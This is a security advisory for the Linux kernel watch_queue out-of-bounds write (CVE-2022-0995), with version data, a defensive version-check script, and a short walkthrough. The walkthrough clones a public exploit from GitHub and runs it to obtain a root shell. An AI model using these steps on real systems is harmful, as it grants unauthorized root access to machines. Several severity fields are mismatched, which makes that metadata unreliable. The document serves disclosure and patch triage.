An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system.
Vulnerability Release Time:
2022-03-14 11:43 UTC
Vulnerability Impact & Type
Successful exploitation of this vulnerability could lead to disclosure of sensitive information, addition or modification of data, or Denial of Service (DoS).
Privilege Escalation
Affected Products:
This vulnerability exists in all Linux versions up to 5.17, RC1 through RC7.
Fixed Versions
Kernel 5.17 RC8 and above
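The version range above can be turned into a quick exposure check. The script below is an added example, not part of the original advisory or of any vendor tooling. It assumes mainline-style release strings as printed by uname -r and a kernel config file path passed in by the caller; CONFIG_WATCH_QUEUE is the kernel build option for the watch_queue subsystem and is not mentioned on this page.

```shell
#!/bin/sh
# Added example: exposure triage for CVE-2022-0995.
# Range taken from the advisory text: affected up to 5.17-rc7, fixed in 5.17-rc8+.
# Assumption: mainline-style release strings as printed by `uname -r`.
# Distribution kernels backport fixes without changing the base version, so an
# "affected" result means "check the vendor advisory", not "confirmed vulnerable".

cve_2022_0995_status() {
    rel=$1
    case "$rel" in
        [0-9]*.[0-9]*) ;;
        *) echo unknown; return 0 ;;
    esac
    major=${rel%%.*}          # "5.17.0-rc7" -> "5"
    rest=${rel#*.}            # "5.17.0-rc7" -> "17.0-rc7"
    minor=${rest%%[!0-9]*}    # "17.0-rc7"   -> "17"
    case "$major:$minor" in
        *[!0-9:]*|*:) echo unknown; return 0 ;;
    esac
    if [ "$major" -gt 5 ]; then echo fixed; return 0; fi
    if [ "$major" -lt 5 ] || [ "$minor" -lt 17 ]; then echo affected; return 0; fi
    if [ "$minor" -gt 17 ]; then echo fixed; return 0; fi
    # Exactly 5.17: only release candidates rc1..rc7 are in the affected range.
    case "$rel" in
        *-rc[0-9]*)
            rc=${rel#*-rc}
            rc=${rc%%[!0-9]*}
            [ -n "$rc" ] || { echo unknown; return 0; }
            if [ "$rc" -le 7 ]; then echo affected; else echo fixed; fi ;;
        *) echo fixed ;;
    esac
}

# A kernel built without CONFIG_WATCH_QUEUE does not contain the watch_queue code.
watch_queue_enabled() {
    grep -q '^CONFIG_WATCH_QUEUE=y' "$1" 2>/dev/null
}

# $1: release string, $2: kernel config file (for example /boot/config-<release>;
# the location is an assumption and varies by distribution).
triage() {
    status=$(cve_2022_0995_status "$1")
    if [ "$status" = affected ] && [ -r "$2" ] && ! watch_queue_enabled "$2"; then
        status=not-built
    fi
    echo "$status"
}
```

Call it as triage "$(uname -r)" "/boot/config-$(uname -r)"; a result of not-built means the version is in range but the subsystem is not compiled in.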
Severity:
The software writes data past the end, or before the beginning, of the intended buffer. This typically occurs when a pointer or its index is incremented or decremented to a position beyond the bounds of the buffer, or when pointer arithmetic results in a position outside the valid memory location, to name a few cases. This may result in corruption of sensitive information, a crash, or code execution, among other things.
CVSS v3.1:
Base Score: 7.2 (High)
CWE ID: 787
Vulnerability type: Low
Gained Access: None
Authentication: None
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
Access Complexity: Low
Mitigation:
Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.
Technical Analysis / Exploits:
1. Log in to the Linux machine as a normal user and show the Linux version in use.
2. Now download the exploit code to the local machine. Use the command below to clone it from the GitHub repository:
git clone https://github.com/Bonfee/CVE-2022-0995.git
3. After cloning the repository, change the current directory to the downloaded repository directory using the command below:
cd CVE-2022-0995
./exploit
4. After the script completes its execution, you will successfully get the root user shell.
5. Now use the command below to get a bash shell as the root user:
/bin/bash
You are now in a root user bash shell and can do everything as the root user.
Reference:
● https://github.com/Bonfee/CVE-2022-0995
● https://nvd.nist.gov/vuln/detail/CVE-2022-0995
● https://access.redhat.com/security/cve/cve-2022-0995